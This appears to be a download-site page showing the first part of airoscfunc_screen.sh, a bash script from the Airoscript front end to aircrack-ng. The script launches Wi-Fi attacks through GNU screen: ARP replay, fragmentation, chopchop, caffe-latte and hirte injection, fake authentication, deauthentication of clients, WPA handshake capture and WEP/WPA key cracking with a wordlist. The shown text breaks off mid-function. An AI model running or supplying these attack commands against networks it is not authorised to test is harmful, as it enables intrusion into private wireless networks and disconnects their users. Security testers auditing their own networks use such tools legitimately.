⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 airoscfunc_screen.sh

📁 Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough dat
💻 SH
📖 第 1 页 / 共 2 页
字号:
#!/bin/bash# Functions that have been modified to work with screen.	#Subproducts of choosescan.	function Scan {		clear		rm -rf $DUMP_PATH/dump*		$CDCMD screen -S airoscript -c /usr/share/airoscript/screenrc -D -RR -X screen 		$CDCMD screen -S airoscript -c /usr/share/airoscript/screenrc -X at "*" stuff "$AIRODUMP -w $DUMP_PATH/dump --encrypt $ENCRYPT -a $WIFI 
"  	}	function attack {			$CDCMD screen -S airoscript -c /usr/share/airoscript/screenrc -D -RR -X screen			$CDCMD screen -S airoscript -c /usr/share/airoscript/screenrc -X at "*" stuff "$AIREPLAY $WIFI --arpreplay -b $Host_MAC -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 -h $FAKE_MAC -x $INJECTRATE "			capture  & fakeauth3 & menufonction		}		#Option 2 (fake auth interactive)		function fakeinteractiveattack {			$CDCMD screen -S airoscript -c /usr/share/airoscript/screenrc -D -RR -X screen			$CDCMD screen -S airoscript -c /usr/share/airoscript/screenrc -X  at "*" stuff "AIREPLAY $WIFI --interactive -p 0841 -c FF:FF:FF:FF:FF:FF -b $Host_MAC -h $FAKE_MAC -x $INJECTRATE"			capture & fakeauth3 & menufonction		}		#Option 3 (fragmentation attack)		function fragnoclient {			rm -rf fragment-*.xor			rm -rf $DUMP_PATH/frag_*.cap			rm -rf $DUMP_PATH/$Host_MAC*			killall -9 airodump-ng aireplay-ng # FIXME Is this a good idea? I think we should save pids of what we launched, and then kill them.			$CDCMD screen -S airoscript -c /usr/share/airoscript/screenrc -D -RR -X screen			$CDCMD screen -S airoscript -c /usr/share/airoscript/screenrc -X  at "*" stuff "$AIREPLAY -5 -b $Host_MAC -h $FAKE_MAC -k $FRAG_CLIENT_IP -l $FRAG_HOST_IP $WIFI"			capture & fakeauth3 &  injectmenu			}		#Option 4 (chopchopattack)		function chopchopattack {			clear			rm -rf $DUMP_PATH/$Host_MAC*			rm -rf replay_dec-*.xor			capture &  fakeauth3 & injectmenu			$CDCMD screen -S airoscript -c /usr/share/airoscript/screenrc -D -RR -X screen			$CDCMD screen -S airoscript -c /usr/share/airoscript/screenrc -X at "*" stuff "$AIREPLAY --chopchop -b $Host_MAC -h $FAKE_MAC $WIFI"		}		#Option 5 (caffe late attack)		function cafelatteattack {			capture & 			$CDCMD screen -S airoscript -c /usr/share/airoscript/screenrc -D -RR -X screen			$CDCMD screen -S airoscript -c /usr/share/airoscript/screenrc -X at "*" stuff "$AIREPLAY -6 -b $Host_MAC -h $FAKE_MAC -x $INJECTRATE -D $WIFI" & fakeauth3 & menufonction			}		#Option 6 (hirte attack)		function hirteattack {			capture & 			$CDCMD screen -S airoscript -c /usr/share/airoscript/screenrc -D -RR -X screen			$CDCMD screen -S airoscript -c /usr/share/airoscript/screenrc -X at "*" stuff "$AIREPLAY -7 -b $Host_MAC -h $FAKE_MAC -x $INJECTRATE -D $WIFI" & fakeauth3 & menufonction		}		#Option 7 (Auto arp replay)		function attackclient {			capture & 			$CDCMD screen -S airoscript -c /usr/share/airoscript/screenrc -D -RR -X screen			$CDCMD screen -S airoscript -c /usr/share/airoscript/screenrc -X at "*" stuff "$AIREPLAY $WIFI --arpreplay -b $Host_MAC -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86  -h $Client_MAC -x $INJECTRATE " & menufonction		}		#Option 8 (interactive arp replay) 		function interactiveattack {			capture & 			$CDCMD screen -S airoscript -c /usr/share/airoscript/screenrc -D -RR -X screen			$CDCMD screen -S airoscript -c /usr/share/airoscript/screenrc -X at "*" stuff "$AIREPLAY $WIFI --interactive -p 0841 -c FF:FF:FF:FF:FF:FF -b $Host_MAC $Client_MAC -x $INJECTRATE" & menufonction		}		#Option 9 (fragmentation attack)		function fragmentationattack {			rm -rf fragment-*.xor			rm -rf $DUMP_PATH/frag_*.cap			rm -rf $DUMP_PATH/$Host_MAC*			killall -9 airodump-ng aireplay-ng			$CDCMD screen -S airoscript -c /usr/share/airoscript/screenrc -D -RR -X screen			$CDCMD screen -S airoscript -c /usr/share/airoscript/screenrc -X at "*" stuff "$$AIREPLAY -5 -b $Host_MAC -h $Client_MAC -k $FRAG_CLIENT_IP -l $FRAG_HOST_IP $WIFI" & capture &  injectmenu		}		#Option 10 (fragmentation attack with client)		function fragmentationattackclient {			rm -rf fragment-*.xor			rm -rf $DUMP_PATH/frag_*.cap			rm -rf $DUMP_PATH/$Host_MAC*			killall -9 airodump-ng aireplay-ng			$CDCMD screen -S airoscript -c /usr/share/airoscript/screenrc -D -RR -X screen			$CDCMD screen -S airoscript -c /usr/share/airoscript/screenrc -X at "*" stuff "$AIREPLAY -7 -b $Host_MAC -h $Client_MAC -k $FRAG_CLIENT_IP -l $FRAG_HOST_IP $WIFI" & capture &  injectmenu		}		#Option 11		function chopchopattackclient {			clear			rm -rf $DUMP_PATH/$Host_MAC*			rm -rf replay_dec-*.xor			capture & $CDCMD screen -S airoscript -c /usr/share/airoscript/screenrc -D -RR -X screen			$CDCMD screen -S airoscript -c /usr/share/airoscript/screenrc -X at "*" stuff "$AIREPLAY --chopchop -h $Client_MAC $WIFI" & injectmenu		}		#Option 12 (pskarp)		function pskarp {			rm -rf $DUMP_PATH/arp_*.cap			$ARPFORGE -0 -a $Host_MAC -h $Client_MAC -k $Client_IP -l $Host_IP -y $DUMP_PATH/dump*.xor -w $DUMP_PATH/arp_$Host_MAC.cap 				capture & $CDCMD screen -S airoscript -c /usr/share/airoscript/screenrc -D -RR -X screen			$CDCMD screen -S airoscript -c /usr/share/airoscript/screenrc -X at "*" stuff "$AIREPLAY --interactive -r $DUMP_PATH/arp_$Host_MAC.cap -h $Client_MAC -x $INJECTRATE $WIFI" & menufonction		}	# If wpa	function wpahandshake {		clear		rm -rf $DUMP_PATH/$Host_MAC*			$CDCMD screen -S airoscript -c /usr/share/airoscript/screenrc -D -RR -X screen			$CDCMD screen -S airoscript -c /usr/share/airoscript/screenrc -X at "*" stuff "$AIRODUMP -w $DUMP_PATH/$Host_MAC --channel $Host_CHAN -a $WIFI" & menufonction	}	# Those are subproducts of crack for wep.		function crackptw   {			$CDCMD screen -S airoscript -c /usr/share/airoscript/screenrc -D -RR -X screen			$CDCMD screen -S airoscript -c /usr/share/airoscript/screenrc -X at "*" stuff " $AIRCRACK -z -b $Host_MAC -f $FUDGEFACTOR -0 -s $DUMP_PATH/$Host_MAC-01.cap" & menufonction		}		function crackstd   {			$CDCMD screen -S airoscript -c /usr/share/airoscript/screenrc -D -RR -X screen			$CDCMD screen -S airoscript -c /usr/share/airoscript/screenrc -X at "*" stuff " $AIRCRACK -a 1 -b $Host_MAC -f $FUDGEFACTOR -0 -s $DUMP_PATH/$Host_MAC-01.cap" & menufonction		}			function crackman {			echo -n "type fudge factor"			read FUDGE_FACTOR			echo You typed: $FUDGE_FACTOR			set -- ${FUDGE_FACTOR}			echo -e -n "`gettext \"type encryption size 64,128 etc...\"`"			read ENC_SIZE			echo You typed: $ENC_SIZE			set -- ${ENC_SIZE}			$CDCMD screen -S airoscript -c /usr/share/airoscript/screenrc -D -RR -X screen			$CDCMD screen -S airoscript -c /usr/share/airoscript/screenrc -X at "*" stuff " $AIRCRACK -a 1 -b $Host_MAC -f $FUDGE_FACTOR -n $ENC_SIZE -0 -s $DUMP_PATH/$Host_MAC-01.cap" & menufonction		}	# This is for wpa cracking	function wpacrack {			$CDCMD screen -S airoscript -c /usr/share/airoscript/screenrc -D -RR -X screen			$CDCMD screen -S airoscript -c /usr/share/airoscript/screenrc -X at "*" stuff "$AIRCRACKOLD $FORCEKOREK -a 2 -b $Host_MAC -0 -s $DUMP_PATH/$Host_MAC-01.cap -w $WORDLIST" & menufonction	}# Those are subproducts of choosefake	function fakeauth1 {					$CDCMD screen -S airoscript -c /usr/share/airoscript/screenrc -D -RR -X screen			$CDCMD screen -S airoscript -c /usr/share/airoscript/screenrc -X at "*" stuff  "$AIREPLAY --fakeauth 6000 -o 1 -q 10 -e $Host_SSID -a $Host_MAC -h $FAKE_MAC $WIFI" & menufonction	}	function fakeauth2 {					$CDCMD screen -S airoscript -c /usr/share/airoscript/screenrc -D -RR -X screen			$CDCMD screen -S airoscript -c /usr/share/airoscript/screenrc -X at "*" stuff "$AIREPLAY --fakeauth 0 -e "$Host_SSID" -a $Host_MAC -h $FAKE_MAC $WIFI" & menufonction	}	function fakeauth3 {			$CDCMD screen -S airoscript -c /usr/share/airoscript/screenrc -D -RR -X screen			$CDCMD screen -S airoscript -c /usr/share/airoscript/screenrc -X at "*" stuff  "$AIREPLAY --fakeauth 5 -o 10 -q 1 -e $Host_SSID -a $Host_MAC -h $FAKE_MAC $WIFI" & menufonction	}		# Subproducts of choosedeauth		function deauthall {						$CDCMD screen -S airoscript -c /usr/share/airoscript/screenrc -D -RR -X screen			$CDCMD screen -S airoscript -c /usr/share/airoscript/screenrc -X at "*" stuff "$AIREPLAY --deauth $DEAUTHTIME -a $Host_MAC $WIFI"		}				function deauthclient {		if [ "$Client_MAC" = "" ]		then				clear			echo "ERROR: You have to select a client first"		else			$CDCMD screen -S airoscript -c /usr/share/airoscript/screenrc -D -RR -X screen			$CDCMD screen -S airoscript -c /usr/share/airoscript/screenrc -X at "*" stuff  "$AIREPLAY --deauth $DEAUTHTIME -a $Host_MAC -c $Client_MAC $WIFI"		fi		}				function deauthfake {

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -